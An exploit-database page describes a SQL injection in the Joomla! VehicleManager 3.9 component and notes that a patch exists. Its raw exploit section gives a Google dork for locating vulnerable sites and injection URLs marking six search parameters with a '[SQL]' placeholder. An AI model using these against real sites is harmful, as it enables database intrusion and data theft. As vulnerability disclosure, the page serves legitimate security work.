header-logo
Suggest Exploit
vendor:
VehicleManager
by:
Ihsan Sencan
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: VehicleManager
Affected Version From: 3.9
Affected Version To: 3.9
Patch Exists: YES
Related CWE: N/A
CPE: a:ordasoft:vehiclemanager:3.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

Joomla! Component VehicleManager v3.9 – SQL Injection

Joomla! Component VehicleManager v3.9 is vulnerable to SQL Injection. This vulnerability can be exploited by sending malicious SQL queries to the vulnerable parameter. The vulnerable parameters are 'vcondition', 'transmission', 'listing_type', 'model', 'fuel_type' and 'maker'. An attacker can use these parameters to inject malicious SQL queries and gain access to the database.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the software to the latest version.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component VehicleManager v3.9 - SQL Injection
# Google Dork: inurl:index.php?option=com_vehiclemanager
# Date: 22.02.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/vehiclemanager-basic/
# Demo: http://ordasvit.com/joomla-vehicle-manager/
# Version: 3.9
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all&vcondition=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=[SQL]
# # # # #

Navigation

Suggest Exploit

Services By CQR